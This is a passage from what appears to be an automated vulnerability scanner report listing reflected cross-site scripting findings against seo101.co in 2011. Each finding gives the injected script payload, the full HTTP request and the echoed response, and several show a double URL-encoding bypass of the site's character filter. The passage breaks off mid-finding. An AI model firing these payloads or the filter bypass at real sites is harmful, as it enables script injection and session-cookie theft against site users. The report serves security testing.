<title>xss.cxff125\"><scri
...[SNIP]...
<meta name="keywords" content="xss.cxff125\"><script>alert(1)</script>977dd139795 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.88. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload 66c2d><script>alert(1)</script>659beb1f019 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C66c2d><script>alert(1)</script>659beb1f019/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:35:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<66c2d><script>alert(1)</script>659beb1f019/title>
...[SNIP]...

4.89. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3a22"><script>alert(1)</script>be6b50741a2 was submitted in the REST URL parameter 1. This input was echoed as a3a22\"><script>alert(1)</script>be6b50741a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Ca3a22"><script>alert(1)</script>be6b50741a2/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:36:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<a3a22\"
...[SNIP]...
<a3a22\"><script>alert(1)</script>be6b50741a2/title>
...[SNIP]...

4.90. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47dd0</script><script>alert(1)</script>5fe6e9ac091 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C47dd0</script><script>alert(1)</script>5fe6e9ac091/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:39:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<47dd0</
...[SNIP]...
<47dd0</script><script>alert(1)</script>5fe6e9ac091/title>
...[SNIP]...

4.91. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 56312%253balert%25281%2529%252f%252fd47ddd65a86 was submitted in the REST URL parameter 2. This input was echoed as 56312;alert(1)//d47ddd65a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C56312%253balert%25281%2529%252f%252fd47ddd65a86/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26839


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<56312;alert(1)//d47ddd65a86/css/default.css SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.92. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload 5fc5e><script>alert(1)</script>c3566bfcb5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:48:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26741


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</5fc5e><script>alert(1)</script>c3566bfcb5f/css/default.css SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.93. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65666"><script>alert(1)</script>0d80a9b1481 was submitted in the REST URL parameter 2. This input was echoed as 65666\"><script>alert(1)</script>0d80a9b1481 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C65666"><script>alert(1)</script>0d80a9b1481/css/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:48:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26897


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<65666\"><script>alert(1)</script>0d80a9b1481/css/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.94. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b1236%253balert%25281%2529%252f%252f15c28f5c4bc was submitted in the REST URL parameter 3. This input was echoed as b1236;alert(1)//15c28f5c4bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/cssb1236%253balert%25281%2529%252f%252f15c28f5c4bc/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26883


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</cssb1236;alert(1)//15c28f5c4bc/default.css SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.95. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cbc2"><script>alert(1)</script>0b7ff5a2d05 was submitted in the REST URL parameter 3. This input was echoed as 7cbc2\"><script>alert(1)</script>0b7ff5a2d05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css7cbc2"><script>alert(1)</script>0b7ff5a2d05/default.css HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css7cbc2\"><script>alert(1)</script>0b7ff5a2d05/default.css seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.96. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c04b"><script>alert(1)</script>825682d9e69 was submitted in the REST URL parameter 4. This input was echoed as 8c04b\"><script>alert(1)</script>825682d9e69 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css8c04b"><script>alert(1)</script>825682d9e69 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:00:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26951


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css/default.css8c04b\"><script>alert(1)</script>825682d9e69 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.97. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ce8fc%253balert%25281%2529%252f%252f374e2009f0a was submitted in the REST URL parameter 4. This input was echoed as ce8fc;alert(1)//374e2009f0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/css/default.cssce8fc%253balert%25281%2529%252f%252f374e2009f0a HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:03:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26863


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</css/default.cssce8fc;alert(1)//374e2009f0a SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.98. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40d2f</script><script>alert(1)</script>bb4f5014ef6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C40d2f</script><script>alert(1)</script>bb4f5014ef6/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<40d2f</
...[SNIP]...
<40d2f</script><script>alert(1)</script>bb4f5014ef6/title>
...[SNIP]...

4.99. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload fcc91><script>alert(1)</script>be03c1556d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cfcc91><script>alert(1)</script>be03c1556d9/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:34:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26898


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<fcc91><script>alert(1)</script>be03c1556d9/title>
...[SNIP]...

4.100. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a5c4"><script>alert(1)</script>a2ee812211f was submitted in the REST URL parameter 1. This input was echoed as 6a5c4\"><script>alert(1)</script>a2ee812211f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C6a5c4"><script>alert(1)</script>a2ee812211f/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:34:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<6a5c4\"
...[SNIP]...
<6a5c4\"><script>alert(1)</script>a2ee812211f/title>
...[SNIP]...

4.101. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5094"><script>alert(1)</script>a62e3e17745 was submitted in the REST URL parameter 2. This input was echoed as c5094\"><script>alert(1)</script>a62e3e17745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cc5094"><script>alert(1)</script>a62e3e17745/img/favicon.ico HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:47:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26920


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<c5094\"><script>alert(1)</script>a62e3e17745/img/favicon.ico seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.102. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
